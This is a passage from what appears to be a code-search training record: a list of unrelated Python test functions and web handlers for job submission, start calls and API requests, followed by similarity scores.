if training_request is None:\n log.error('frontend::train_request::invalid_request')\n flask.abort(400)\n\n job_id = _database_operations.create_new_job(training_request, Session())\n log.info('frontend::train_request::request_training', job_id=job_id)\n return job_id", "def test():\n request = pb2.TestRequest.FromString(flask.request.get_data())\n logger.debug(\"Flask service received: %s\", request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "def test_start_refresh(api: API, account: Account):\n api.candlepin.refresh.return_value = {\"id\": 123456} # type: ignore\n account.start_refresh()\n api.candlepin.refresh.assert_called_once() # type: ignore\n assert account._latest_refresh_job_id == 123456", "def test_fax_inbound_automation_post(self):\n pass", "def test_get_submission(self):\n # creating a submission\n sub_register = register_ok_submission(self, self.token)\n response_data = json.loads(sub_register.data.decode())\n self.assertTrue(response_data['status']=='success')\n\n # getting it from the service\n get_response = get_submissions(self, self.token)\n response_data = json.loads(get_response.data.decode())\n self.assertTrue(response_data['data'][0]['text_count']==2)\n self.assertTrue(isinstance(response_data['data'][0]['texts'], list))", "def test_request_spartan_grasp(self, *args, **kwargs):\n self.taskRunner.callOnThread(self.request_spartan_grasp, *args, **kwargs)", "def test_create_task_empty_request_body_success(\n self,\n mock_background_tasks,\n ):\n rv = TEST_CLIENT.post(TASK_ROUTE, json={})\n self.assertEqual(rv.status_code, 200)", "def test_adding_a_batch(created_job, bulk_request):\n bulk_request.reset_mock()\n bulk_request.return_value = '''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <batchInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <id>BATCHONE</id>\n <jobId>THEJOBID</jobId>\n <state>Queued</state>\n </batchInfo>\n '''\n\n fake_data = [('1', '2'), ('3', '4')]\n created_job.add_batch(['Id', 'Name'], iter(fake_data))\n\n assert created_job.pending_batches == ['BATCHONE']\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job/THEJOBID/batch',\n content_type='text/csv; charset=UTF-8',\n data=mock.ANY\n )\n\n data = bulk_request.call_args[1]['data']\n assert b''.join(data) == b'Id,Name\\r\\n1,2\\r\\n3,4\\r\\n'", "def test_run_started(self):", "def test_api_get(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200, body=b'some xml and stuff')\n response = new_job.request('get', url, expected_response=200)\n assert response == b'some xml and stuff'", "def setUp(self):\n response = self.client.post('/trainer/create/',\n {\"name\": \"Blue\",\n \"las_name\": \"Oak\"})\n self.trainer_id = response.json()[\"id\"]", "def testCreateStartedPeriodic(self, mock_time): # pylint: disable=no-self-use\n mock_time.return_value = 1000\n gcs_client = mock.MagicMock(spec=storage.Client)\n blob = prow.create_started(gcs_client, \"gs://bucket/output\", \"abcd\")\n\n expected = {\n \"timestamp\": 1000,\n \"repos\": {\n \"kubeflow/tf-operator\": \"abcd\",\n },\n }\n blob.upload_from_string.assert_called_once_with(json.dumps(expected))", "def test_cron(mock_post, test_operator, header_fx):\n test_operator.cron()\n mock_post.assert_called_with(\"https://habitica.com/api/v3/cron\",\n headers=header_fx)", "async def test_post_400():\n work_queue = asyncio.Queue()\n await work_queue.put(TestData.JOB_TEMPLATE_POST_PAYLOAD)\n worker = tower_api_worker.TowerApiWorker(TestData.config, None, work_queue)\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL, status=400, body=\"BAD DATA\",\n )\n with pytest.raises(Exception) as excinfo:\n await worker.start()\n assert \"BAD DATA\" in str(excinfo.value)", "def start(self):\n self._client.predict(\n endpoint=self._endpoint, instances=self._request)\n\n if self._completion_callback:\n if self._query_handle:\n callback_args = [self._query_handle]\n else:\n callback_args = []\n self._completion_callback(*callback_args)", "def start():\n\tdata = bottle.request.json\n\t(\"START:\", json.dumps(data))\n\n\tresponse = {\"color\": \"#4F1851\", \"headType\": \"evil\", \"tailType\": \"hook\"}\n\treturn HTTPResponse(\n\t\tstatus=200,\n\t\theaders={\"Content-Type\": \"application/json\"},\n\t\tbody=json.dumps(response),\n\t)", "def start_flow():\n if request.method == 'GET':\n tel = request.args.get('tel')\n flow = request.args.get('flow')\n to_rp = request.args.get('to')\n if to_rp == \"io\":\n client = io_client\n elif to_rp == \"datos\":\n client = mx_client\n else:\n return jsonify({}), 404\n contact = client.get_contacts(urn=['tel:+52' + tel]).all()\n if contact:\n client.create_flow_start(\n flow=flow,\n contacts=[contact[0].uuid],\n )\n return jsonify({\"Inicio_flow\": \"Si\"}), 201\n return jsonify({\"Inicio_flow\": \"No\"}), 404", "def create_call_ticket(data):\n firebase_uid = data['session'].split('/')[-1]\n contexts = data['queryResult']['outputContexts']\n for i in contexts:\n if 'call_data' in i['name']:\n context = i\n break\n\n date = datetime.datetime.now()\n date = date.strftime(\"%d-%m-%Y\")\n\n raw_params = context['parameters']\n\n free_time = {\n \"Time\": raw_params[\"free_time\"][\"time\"],\n \"Date\": raw_params[\"free_date\"][\"date\"]\n }\n ticket_params = {\n \"Agent\": \"None\",\n \"Product Type\": raw_params[\"product_type\"],\n \"Type\": \"Phone Call\",\n \"Issue Type\": raw_params[\"issue_type\"],\n \"Model Number\": raw_params[\"model_number\"],\n \"Serial Number\": raw_params[\"serial_number\"],\n \"Description\": \"0\",\n \"Status\": \"Open\",\n \"Date\": date,\n \"Time Slot Chosen\": \"0\",\n \"Time Slots\": {\"Slot 1\": {\"Time\": \"0\", \"Date\": \"0\"},\n \"Slot 2\": {\"Time\": \"0\", \"Date\": \"0\"},\n \"Slot 3\": {\"Time\": \"0\", \"Date\": \"0\"}},\n \"Progress\": \"Under Review\",\n \"Free Time\": free_time,\n \"Details of Call\": {\n \"Time\": \"0\",\n \"Date\": \"0\"}\n }\n\n ticket_id = str(uuid.uuid4())[:8]\n pprint.pprint(ticket_params)\n db = firebase.database()\n db.child(\n 'user_data').child(\n firebase_uid).child(\n 'Complaints').child(ticket_id).set(ticket_params)\n\n fulfillment_response = {\n \"fulfillmentText\":\n \"You appointment was successfully registered. The reference number for this ticket is \" + ticket_id +\n \". The timings of your call would be confirmed soon. You check the status by asking me or by going to the \"\n \"\\\"Tickets\\\" section of the app.\"}\n return fulfillment_response", "def test_jobs_successful(self):\n\n workspace = storage_test_utils.create_workspace()\n file1 = storage_test_utils.create_file()\n data_dict = {\n 'version': '1.0',\n 'input_data': [{\n 'name': 'INPUT_IMAGE',\n 'file_id': file1.id\n }],\n 'output_data': [{\n 'name': 'output_file_pngs',\n 'workspace_id': workspace.id\n }]}\n\n secret_configuration = {\n 'version': '6',\n 'priority': 50,\n 'output_workspaces': {'default': storage_test_utils.create_workspace().name},\n 'settings': {\n 'DB_HOST': 'som.host.name',\n 'DB_PASS': 'secret_password'\n }\n }\n\n seed_job_type = job_test_utils.create_seed_job_type(configuration=secret_configuration)\n seed_job = job_test_utils.create_job(job_type=seed_job_type, status='RUNNING', input=data_dict)\n\n url = '/%s/jobs/%d/' % (self.api, seed_job.id)\n response = self.client.generic('GET', url)\n result = json.loads(response.content)\n\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n self.assertEqual(result['configuration']['priority'],50)\n self.assertNotIn('DB_PASS', result['configuration']['settings'])", "async def test_api_call_service_no_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\"\"\"\n test_value.append(1)\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n await mock_api_client.post(\"/api/services/test_domain/test_service\")\n await hass.async_block_till_done()\n assert len(test_value) == 1", "def test_run(self) -> None:\n startDate = dt.datetime.now() - dt.timedelta(days=1)\n endDate = startDate\n\n rawFreqCreator = RawFrequencyCreationHandler(\n self.appConfig['rawFrequencyCreationServiceUrl'])\n resp = rawFreqCreator.createRawFrequency(startDate, endDate)\n self.assertTrue(resp['isSuccess'])\n self.assertTrue(resp['status'] == 200)\n self.assertTrue('message' in resp)", "async def test_setup_post(hass: HomeAssistant) -> None:\n respx.post(\"http://localhost\").respond(\n status_code=HTTPStatus.OK, json={\"key\": \"123\"}\n )\n assert await async_setup_component(\n hass,\n SENSOR_DOMAIN,\n {\n SENSOR_DOMAIN: {\n \"platform\": DOMAIN,\n \"resource\": \"http://localhost\",\n \"method\": \"POST\",\n \"value_template\": \"{{ value_json.key }}\",\n \"payload\": '{ \"device\": \"toaster\"}',\n \"name\": \"foo\",\n \"unit_of_measurement\": UnitOfInformation.MEGABYTES,\n \"verify_ssl\": \"true\",\n \"timeout\": 30,\n \"authentication\": \"basic\",\n \"username\": \"my username\",\n \"password\": \"my password\",\n \"headers\": {\"Accept\": CONTENT_TYPE_JSON},\n }\n },\n )\n await hass.async_block_till_done()\n assert len(hass.states.async_all(SENSOR_DOMAIN)) == 1", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def test_add_seed_job_type(self):\n\n url = '/%s/job-types/' % self.api\n manifest = copy.deepcopy(job_test_utils.COMPLETE_MANIFEST)\n manifest['job']['name'] = 'my-new-job'\n\n json_data = {\n 'icon_code': 'BEEF',\n 'is_published': True,\n 'docker_image': 'my-new-job-1.0.0-seed:1.0.0',\n 'manifest': manifest,\n 'configuration': self.configuration\n }\n\n good_setting = {\n 'DB_HOST': 'scale'\n }\n\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n self.assertTrue('/%s/job-types/my-new-job/1.0.0/' % self.api in response['location'])\n\n job_type = JobType.objects.filter(name='my-new-job').first()\n\n results = json.loads(response.content)\n self.assertEqual(results['id'], job_type.id)\n self.assertEqual(results['version'], job_type.version)\n self.assertEqual(results['title'], job_type.get_title())\n self.assertEqual(results['revision_num'], job_type.revision_num)\n self.assertEqual(results['revision_num'], 1)\n self.assertIsNone(results['max_scheduled'])\n self.assertEqual(results['configuration']['settings'], good_setting)", "def request_start(self, req):\n log.info(\"Received start request\")\n if not self._configured:\n msg = \"FITS interface server is not configured\"\n log.error(msg)\n return (\"fail\", msg)\n try:\n fw_socket = self._fw_connection_manager.get_transmit_socket()\n except Exception as error:\n log.exception(str(error))\n return (\"fail\", str(error))\n log.info(\"Starting FITS interface capture\")\n self._stop_capture()\n buffer_size = 4 * (self.nchannels + 2)\n handler = R2SpectrometerHandler(2, self.nchannels,\n self.integration_time,\n self.nblank_phases,\n fw_socket)\n self._capture_thread = CaptureData(self._capture_interface,\n self._capture_port,\n buffer_size,\n handler)\n self._capture_thread.start()\n return (\"ok\",)", "def run_post(payload, response):\n message = FakeMessage()\n message.raw_payload = payload\n response_queue = queue.Queue()\n headers = {\"Content-Type\": \"application/json\"}\n with aioresponses() as mocked:\n mocked.post(\n TestData.JOB_TEMPLATE_POST_URL,\n status=200,\n body=json.dumps(response),\n headers=headers,\n )\n worker.execute(message, TestData.RECEPTOR_CONFIG, response_queue)\n\n return response_queue", "def test_start_already_running(self, mock_add_job, mock_get_job):\n mock_get_job.return_value = MagicMock()\n\n result = self.aggregator.start(self.node_id)\n\n self.assertFalse(result)\n self.assertFalse(mock_add_job.called)", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_get_one_flow_requests_as_super_client(self):\n headers = self._get_oauth_header(client_name=DISPATCHER_NAME)\n res = self.client.get('/v1/flow_requests/p_11111/', **headers)\n self.assertEqual(res.status_code, 200)\n profile = {\n 'code': 'PROF_001',\n 'version': 'v0',\n 'payload': '[{\"clinical_domain\": \"Laboratory\"}]'\n }\n expected = {\n 'flow_id': 'f_11111',\n 'process_id': 'p_11111',\n 'status': 'PE',\n 'profile': profile,\n 'sources': [{\n 'source_id': SOURCE_1_ID,\n 'name': SOURCE_1_NAME,\n 'profile': profile\n }],\n 'start_validity': '2017-10-23T10:00:00+02:00',\n 'expire_validity': '2018-10-23T10:00:00+02:00'\n }\n self.assertDictEqual(res.json(), expected)", "async def test_api_fire_event_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n test_value = []\n\n @ha.callback\n def listener(event):\n \"\"\"Record that our event got called.\n\n Also test if our data came through.\n \"\"\"\n if \"test\" in event.data:\n test_value.append(1)\n\n hass.bus.async_listen_once(\"test_event_with_data\", listener)\n\n await mock_api_client.post(\"/api/events/test_event_with_data\", json={\"test\": 1})\n\n await hass.async_block_till_done()\n\n assert len(test_value) == 1", "def test_start_process(self, mocked_check):\n from supvisors.rpcinterface import RPCInterface\n # get patches\n mocked_start = self.supervisor.supvisors.starter.start_process\n mocked_progress = self.supervisor.supvisors.starter.in_progress\n # create RPC instance\n rpc = RPCInterface(self.supervisor)\n # patch the instance\n rpc._get_application_process = Mock()\n # test RPC call with unknown strategy\n with self.assertRaises(RPCError) as exc:\n rpc.start_process('strategy', 'appli:proc')\n self.assertEqual(Faults.BAD_STRATEGY, exc.exception.code)\n self.assertEqual('BAD_STRATEGY: strategy', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running process\n rpc._get_application_process.return_value = (\n None, Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc1'}))\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with running processes\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n Mock(**{'running.return_value': False}),\n Mock(**{'running.return_value': True,\n 'namespec.return_value': 'proc2'})]}), None)\n with self.assertRaises(RPCError) as exc:\n rpc.start_process(0, 'appli_1')\n self.assertEqual(Faults.ALREADY_STARTED, exc.exception.code)\n self.assertEqual('ALREADY_STARTED: proc2', exc.exception.text)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual(0, mocked_start.call_count)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n # test RPC call with stopped processes\n proc_1 = Mock(**{'running.return_value': False,\n 'stopped.return_value': True,\n 'namespec.return_value': 'proc1'})\n proc_2 = Mock(**{'running.return_value': False,\n 'stopped.return_value': False,\n 'namespec.return_value': 'proc2'})\n rpc._get_application_process.return_value = (\n Mock(**{'processes.values.return_value': [\n proc_1, proc_2]}), None)\n # test RPC call with no wait and not done\n mocked_start.return_value = False\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call no wait and done\n mocked_start.return_value = True\n result = rpc.start_process(1, 'appli:*', 'argument list', False)\n self.assertTrue(result)\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(1, proc_1, 'argument list'),\n call(1, proc_2, 'argument list')], mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and done\n result = rpc.start_process(2, 'appli:*', wait=True)\n self.assertTrue(result)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n mocked_check.reset_mock()\n mocked_start.reset_mock()\n # test RPC call with wait and not done\n mocked_start.return_value = False\n deferred = rpc.start_process(2, 'appli:*', wait=True)\n # result is a function for deferred result\n self.assertTrue(callable(deferred))\n self.assertEqual([call()], mocked_check.call_args_list)\n self.assertEqual([call(2, proc_1, ''), call(2, proc_2, '')],\n mocked_start.call_args_list)\n self.assertEqual(0, mocked_progress.call_count)\n # test returned function: return True when job in progress\n mocked_progress.return_value = True\n self.assertEqual(NOT_DONE_YET, deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: raise exception if job not in progress anymore\n # and process still stopped\n mocked_progress.return_value = False\n with self.assertRaises(RPCError) as exc:\n deferred()\n self.assertEqual(Faults.ABNORMAL_TERMINATION, exc.exception.code)\n self.assertEqual('ABNORMAL_TERMINATION: proc1', exc.exception.text)\n self.assertEqual([call()], mocked_progress.call_args_list)\n mocked_progress.reset_mock()\n # test returned function: return True if job not in progress anymore\n # and process running\n proc_1.stopped.return_value = False\n self.assertTrue(deferred())\n self.assertEqual([call()], mocked_progress.call_args_list)", "def TestCaseWillStart(self, request, context):\n LOGGER.info('Received request for TestCaseWillStart %s', request)\n for plugin in self.plugins:\n plugin.test_case_will_start(request)\n return test_plugin_service_pb2.TestCaseWillStartResponse()", "def test_success(self, data_flow_api_client, contact_factory):\n contact = contact_factory()\n response = data_flow_api_client.get(self.view_url)\n assert response.status_code == status.HTTP_200_OK\n response_results = response.json()['results']\n assert len(response_results) == 1\n result = response_results[0]\n expected_result = get_expected_data_from_contact(contact)\n assert result == expected_result", "def test_batch(self):\n batch = batch_test_utils.create_batch()\n self.job1.batch_id = batch.id\n self.job1.save()\n\n url = '/%s/jobs/?batch_id=%d' % (self.api, batch.id)\n response = self.client.generic('GET', url)\n self.assertEqual(response.status_code, status.HTTP_200_OK, response.content)\n\n result = json.loads(response.content)\n self.assertEqual(len(result['results']), 1)\n self.assertEqual(result['results'][0]['id'], self.job1.id)", "def call_init(mac_address, ip_address, start_port, free_ports):\n url = INIT_URL\n init_dict = {'IPAddress': ip_address, 'MacAddress': mac_address, 'OpenPorts': free_ports, 'StartPort': start_port}\n logging.info(\"Calling coordinator at url: %s, with dict: %s\", url, str(init_dict))\n try:\n resp = requests.post(url, json=init_dict, timeout=10)\n except requests.exceptions.RequestException as e:\n return None, e\n return resp, None", "def test_create(self, client, job, agent_token):\n stage_url = '{base}/stages/teststage'.format(base=job_url_for(job))\n response = client.put(\n stage_url,\n headers={'x_dockci_api_key': agent_token},\n data={'success': 'true'},\n )\n\n assert response.status_code == 200 # TODO 201\n\n response_data = json.loads(response.data.decode())\n assert response_data.pop('success') == True\n\n response = client.get(stage_url)\n response_data = json.loads(response.data.decode())\n assert response_data.pop('success') == True" ]
[ "0.80795336", "0.7127848", "0.70870763", "0.70252454", "0.690225", "0.682077", "0.6728949", "0.64632064", "0.61601955", "0.61388147", "0.6122343", "0.61069036", "0.598875", "0.5923191", "0.5838878", "0.5811853", "0.581069", "0.5795599", "0.5779675", "0.5745532", "0.5728147", "0.56856054", "0.5582621", "0.55753636", "0.5550645", "0.5547853", "0.5522678", "0.5479358", "0.54533166", "0.54498565", "0.54230976", "0.5407813", "0.53979623", "0.5366026", "0.5354841", "0.53508025", "0.5342026", "0.53418946", "0.5330491", "0.5299709", "0.5296479", "0.52537686", "0.52534497", "0.52500015", "0.524651", "0.5238322", "0.52335644", "0.5233009", "0.5224867", "0.52202505", "0.52192134", "0.52169645", "0.5216273", "0.52086025", "0.520387", "0.51944745", "0.5194037", "0.5160752", "0.51502174", "0.5148969", "0.5147824", "0.5141284", "0.51406324", "0.51400423", "0.513831", "0.511265", "0.511024", "0.5106004", "0.50917023", "0.50888795", "0.50863963", "0.508425", "0.50786775", "0.5060322", "0.5055971", "0.50526893", "0.50522816", "0.5049597", "0.5046774", "0.5030588", "0.5022567", "0.5022117", "0.50215995", "0.50192434", "0.5017053", "0.5014981", "0.5011428", "0.50083375", "0.49975094", "0.4990421", "0.49884924", "0.498584", "0.49840343", "0.49780312", "0.49775067", "0.49761584", "0.49746963", "0.49739218", "0.49700323", "0.4961983" ]
0.8062351
1
Test the job_id URL of a start call registry POST. Test uses start_call_fx fixture
def test_expect_200Ok_response_GETting_a_job_id_URL(client, start_call_fx): url = reverse_lazy('calls:registry-list') response = client.post(url, start_call_fx, content_type='application/json') response_data = response.json() task_url = response_data.get('job_id', None) task_response = client.get(task_url) assert task_response.status_code == status.HTTP_200_OK
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_post_a_start_call_and_recover_it_using_a_GET_request(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n post_request = client.post(url,\n start_call_fx,\n content_type='application/json')\n\n assert post_request.status_code == status.HTTP_201_CREATED\n\n job_url = post_request.data.get('job_id')\n\n job_request = client.get(job_url)\n\n result = json.loads(job_request.data.get('result'))\n\n get_request = client.get(result.get('url'))\n\n response = get_request.json()\n\n assert get_request.status_code == status.HTTP_200_OK\n for key, value in start_call_fx.items():\n assert value == response.get(key)", "def test_POST_a_call_and_expect_job_id_and_data_posted(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n response_data = response.json()\n\n assert response.status_code == status.HTTP_201_CREATED\n assert 'job_id' in response_data\n\n for item in start_call_fx.items():\n assert item in response_data['data'].items()", "def test_post_a_start_and_stop_registry_and_get_a_call_using_url(client,\n start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-detail', kwargs={'call_id': 1})\n\n response = client.get(get_url)\n\n assert response.data.get('start_timestamp')\n assert response.data.get('stop_timestamp')", "def test_expect_status_property_about_registry_process(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n assert job.data.get('status') == 'DONE'", "def test_post_a_start_and_stop_registry_and_get_a_call(client, start_call_fx,\n stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n post_data = [start_call_fx, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1\n assert response.data[0].get('start_timestamp')\n assert response.data[0].get('stop_timestamp')", "def test_expect_data_posted_return_encapsulated_on_message_property_on_response(client, start_call_fx):\n\n url = reverse_lazy('calls:registry-list')\n\n response = client.post(url, start_call_fx, content_type='application/json')\n\n job_id = response.data.get('job_id')\n\n job = client.get(job_id)\n\n result = job.json()\n\n assert result.get('result')\n\n registry_url = json.loads(result.get('result'))\n\n assert client.get(registry_url.get('url')).status_code == status.HTTP_200_OK", "def start_test(self, request):\n request.worker.start_test(request.message.test_id)\n\n return SuccessReply()", "def test_start_post(self):\n response = self.client.open('/start',\n method='POST')\n self.assert200(response, \"Response body is : \" + response.data.decode('utf-8'))", "def test_submit_job(self):\n body = '\\\"{train: \\\\\\\"http:/github.com/path/file1\\\\\\\", seed:5, epochs: 5000}\\\"'\n response = self.client.open(\n '/tx-queue/2/scheduler/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_api_post(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('POST', url, status=201, body=b'some xml and stuff')\n response = new_job.request('post', url, data=b'stuff')\n assert response == b'some xml and stuff'\n assert httpretty.last_request().body == b'stuff'", "def test_post_job(self):\n body = UnitTesterJobCreateReq()\n response = self.client.open(\n '/v1/job',\n method='POST',\n data=json.dumps(body),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_start_post(self):\n StartConfiguration = StartConfiguration()\n response = self.client.open(\n '/start',\n method='POST',\n data=json.dumps(StartConfiguration),\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_creating_a_job(created_job, bulk_request):\n assert created_job.job == 'THEJOBID'\n assert created_job.job_url == 'https://salesforce/services/async/34.0/job/THEJOBID'\n assert created_job.pending_batches == []\n assert created_job.is_open\n\n bulk_request.assert_called_once_with(\n 'post',\n 'https://salesforce/services/async/34.0/job',\n data=XMLMatcher('''<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <jobInfo xmlns=\"http://www.force.com/2009/06/asyncapi/dataload\">\n <operation>update</operation>\n <object>Lead</object>\n <contentType>CSV</contentType>\n </jobInfo>\n ''')\n )", "def pytest_runtest_call(self, item):\n if not item.config.option.tc_duration:\n self.detailed_duration[item.nodeid]['call'] = time.time()\n\n if self._buildname is None:\n self.buildname(item.config.env.env_prop)\n if self._buildname is not None and not self._init_session:\n self._sessionstart(item)\n self._init_session = True\n self._send_post_request(item)", "def start_test_run(self, request):\n request.worker.initialize_test_run(request.message.tests,\n request.message.run_data)\n\n return SuccessReply()", "def test_create_startliste(http_service: Any) -> None:\n url = f\"{http_service}/start\"\n with open(\"tests/files/G11KvartStart.json\") as json_file:\n data = json.load(json_file)\n\n headers = {\"content-type\": \"application/json; charset=utf-8\"}\n response = requests.post(url, headers=headers, json=data)\n assert response.status_code == 201", "def testTurbiniaStart(self, mock_create_request):\n mock_create_request.return_value = {\n \"request_id\": \"41483253079448e59685d88f37ab91f7\"\n }\n mock_api_instance = mock.MagicMock()\n mock_api_instance.create_request = mock_create_request\n self.turbinia_processor.requests_api_instance = mock_api_instance\n evidence = {\n \"type\": \"GoogleCloudDisk\",\n \"disk_name\": \"disk-1\",\n \"project\": \"project-1\",\n \"zone\": \"us-central1-f\",\n }\n request_id = self.turbinia_processor.TurbiniaStart(\n evidence=evidence, yara_rules=YARA_RULE)\n self.assertEqual(request_id, \"41483253079448e59685d88f37ab91f7\")", "def test_api_get(httpretty, new_job):\n url = 'https://salesforce/services/async/34.0/job/THEJOBID'\n httpretty.register_uri('GET', url, status=200, body=b'some xml and stuff')\n response = new_job.request('get', url, expected_response=200)\n assert response == b'some xml and stuff'", "def test_call_api_return_only_consolidated_calls(client, start_call_fx, stop_call_fx):\n\n post_url = reverse_lazy('calls:registry-list')\n\n start_call_fx_2 = copy(start_call_fx)\n start_call_fx_2['call_id'] = 2\n\n post_data = [start_call_fx, start_call_fx_2, stop_call_fx]\n\n for data in post_data:\n response = client.post(post_url, data, content_type='application/json')\n assert response.status_code == status.HTTP_201_CREATED\n\n get_url = reverse_lazy('calls:call-list')\n\n response = client.get(get_url)\n\n assert len(response.data) == 1", "def test_callback_calls_celery_task(self, rf):\n product = product_factory()\n request = rf.post('/')\n\n url = request.build_absolute_uri(product.get_absolute_url())\n\n with patch('remindme.tasks.send_notification_email.delay') as task:\n product_in_stock_callback(\n self.__class__, product=product, request=request\n )\n task.assert_called_with(product.pk, product.title, url)", "def test_get_job(self):\n response = self.client.open(\n '/v1/job/{id}'.format(id='id_example'),\n method='GET',\n content_type='application/json')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))", "def test_success_on_post(self, mock_create, mock_msg_mgr):\n\n url = '/%s/jobs/' % self.api\n\n User.objects.create_superuser(username='test', email='[email protected]', password='password')\n\n self.client.login(username='test', password='password',)\n response = self.client.post(url, data=self.json_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n # Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_successful(self, mock_create, mock_msg_mgr):\n\n json_data = {\n \"input\" : {\n 'version': '6',\n 'files': {'input_a': [self.source_file.id]},\n 'json': {}\n },\n \"job_type_id\" : self.job_type1.pk\n }\n\n url = '/%s/jobs/' % self.api\n response = self.client.generic('POST', url, json.dumps(json_data), 'application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED, response.content)\n\n result = json.loads(response.content)\n\n #Response should be new v6 job detail response\n self.assertEqual(result['execution'], None)\n self.assertEqual(result['max_tries'], 3)\n self.assertTrue('/%s/jobs/' % self.api in response['location'])\n mock_create.assert_called_once()", "def run_test(server_base_url, delayed_jobs_server_base_path):\n\n print('-------------------------------------------')\n print('Testing the element usage endpoint')\n print('-------------------------------------------')\n print('delayed_jobs_server_base_path: ', delayed_jobs_server_base_path)\n\n url = f'{server_base_url}/frontend_element_usage/register_element_usage'\n\n payload = {\n 'view_name': 'Compound-CompoundNameAndClassification',\n 'view_type': 